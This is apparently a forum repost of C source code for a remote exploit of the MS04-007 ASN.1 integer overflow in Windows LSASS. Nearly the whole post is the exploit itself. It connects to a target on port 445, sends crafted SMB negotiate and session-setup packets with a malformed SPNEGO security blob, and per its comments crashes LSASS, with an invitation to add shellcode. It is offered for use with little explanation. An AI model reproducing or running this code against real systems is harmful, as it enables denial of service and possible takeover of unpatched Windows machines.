Microsoft Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007) DOS

Microsoft Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)

Código:

/*
* MS04-007 LSASS.EXE Remote Integer Overflow (unfinished)
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

/*
* inside Visual C++ : Build -> Start Debug -> Attach to Process -> LSASS
* after running this code, LSASS generates an Access violation (0xC0000005)
* at LSASRV!0x78543102 call dword ptr [ecx+20h]
*/

#ifdef WIN32

#include <winsock2.h>
#include <windows.h>

#else

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#endif

#include <stdio.h>

/****************************************************************/

unsigned char negotiate_req[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\x00\xB3"

"\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE7\x13\x00\x00\x01\x00"

/* Negotiate Protocol Request, actually sniffed from smbclient */

"\x00\x90\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50"
"\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4D\x49\x43\x52"
"\x4F\x53\x4F\x46\x54\x20\x4E\x45\x54\x57\x4F\x52\x4B\x53\x20\x31"
"\x2E\x30\x33\x00\x02\x4D\x49\x43\x52\x4F\x53\x4F\x46\x54\x20\x4E"
"\x45\x54\x57\x4F\x52\x4B\x53\x20\x33\x2E\x30\x00\x02\x4C\x41\x4E"
"\x4D\x41\x4E\x31\x2E\x30\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x44\x4F\x53\x20\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31"
"\x00\x02\x53\x61\x6D\x62\x61\x00\x02\x4E\x54\x20\x4C\x41\x4E\x4D"
"\x41\x4E\x20\x31\x2E\x30\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E"
"\x31\x32\x00";

/****************************************************************/

unsigned char setup_request[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\x00\xFF"

"\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE7\x13\x00\x00\x02\x00"

/* Session Setup AndX Request */

"\x0C\xFF\x00\x00\x00\xFF\xFF\x02\x00\x01\x00\x00\x00\x00\x00\x52"
"\x00\x00\x00\x00\x00\x5C\x00\x00\x80\x69\x00";

/* Security Blob - SPNEGO OID + ASN.1 stuff */

unsigned char security_blob[] =

"\x60\x57\x06\x06\x2B\x06\x01\x05\x05\x02"

"\xA0\x4D\x30\x4B"

"\xA0\x0E\x30\x0C\x06\x0A\x2B\x06\x01\x04\x01\x82\x37\x02\x02\x0A"

"\xA1\x05\x23\x03\x03\x01\x07"

"\xA2\x32\x04\x30\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00"
"\x15\x02\x08\x60\x09\x00\x09\x00\x20\x00\x00\x00\x07\x00\x07\x00"
"\x29\x00\x00\x00\x57\x4F\x52\x4B\x47\x52\x4F\x55\x50\x58\x58\x58"
"\x58\x58\x58\x58";

/* Maybe someone could add a shellcode here */

unsigned char other_stuff[] =

"\x00\x55\x00\x6E\x00\x69\x00\x78\x00\x00\x00\x53\x00\x61\x00\x6D"
"\x00\x62\x00\x61\x00\x00\x00";

/****************************************************************/

#define uint16 unsigned short

int main( int argc, char *argv[] )
{
int len, server_fd, n1, n2, n3;
struct sockaddr_in server_addr;
struct hostent *server_host;
unsigned char buf[4096];

#ifdef WIN32

WSADATA wsa;

/* initialize windows sockets */

if( WSAStartup( MAKEWORD(2,0), &wsa ) )
{
fprintf( stderr, "WSAStartup failed\n" );
return( 1 );
}

#endif

if( argc != 2 )
{
fprintf( stderr, "usage: %s <target hostname>\n", argv[0] );
return( 1 );
}

/* resolve the server hostname and connect to it */

server_host = gethostbyname( argv[1] );

if( server_host == NULL )
{
fprintf( stderr, "gethostbyname(%s) failed\n", argv[1] );
return( 1 );
}

memcpy( (void *) &server_addr.sin_addr,
(void *) server_host->h_addr,
server_host->h_length );

server_addr.sin_family = AF_INET;
server_addr.sin_port = htons( 445 );

server_fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );

if( server_fd < 0 )
{
perror( "socket" );
return( 1 );
}

len = sizeof( server_addr );

if( connect( server_fd, (struct sockaddr *)
&server_addr, len ) < 0 )
{
perror( "connect on port 445" );
return( 1 );
}

/* send the Negotiate Protocol Request */

len = sizeof( negotiate_req ) - 1;

if( send( server_fd, negotiate_req, len, 0 ) != len )
{
perror( "send" );
return( 1 );
}

/* receive the Negotiate Protocol Response */

if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
{
perror( "recv" );
return( 1 );
}

/* now create the special SS&X Request */

n1 = sizeof( setup_request ) - 1;
n2 = sizeof( security_blob ) - 1;
n3 = sizeof( other_stuff ) - 1;

len = n1 + n2 + n3;

memcpy( buf, setup_request, n1 );
memcpy( buf + n1, security_blob, n2 );
memcpy( buf + n1 + n2, other_stuff, n3 );

*(uint16 *)( &buf[ 2] ) = htons( len - 4 );
*(uint16 *)( &buf[51] ) = n2; /* Security Blob Length */
*(uint16 *)( &buf[61] ) = n2 + n3; /* Byte Count (BCC) */

if( send( server_fd, buf, len, 0 ) != len )
{
perror( "send" );
return( 1 );
}

/* receive the SS&XR Response */

recv( server_fd, buf, sizeof( buf ), 0 );

shutdown( server_fd, 2 );

return( 0 );
}

Fuente : www.k-otik.com

Saludos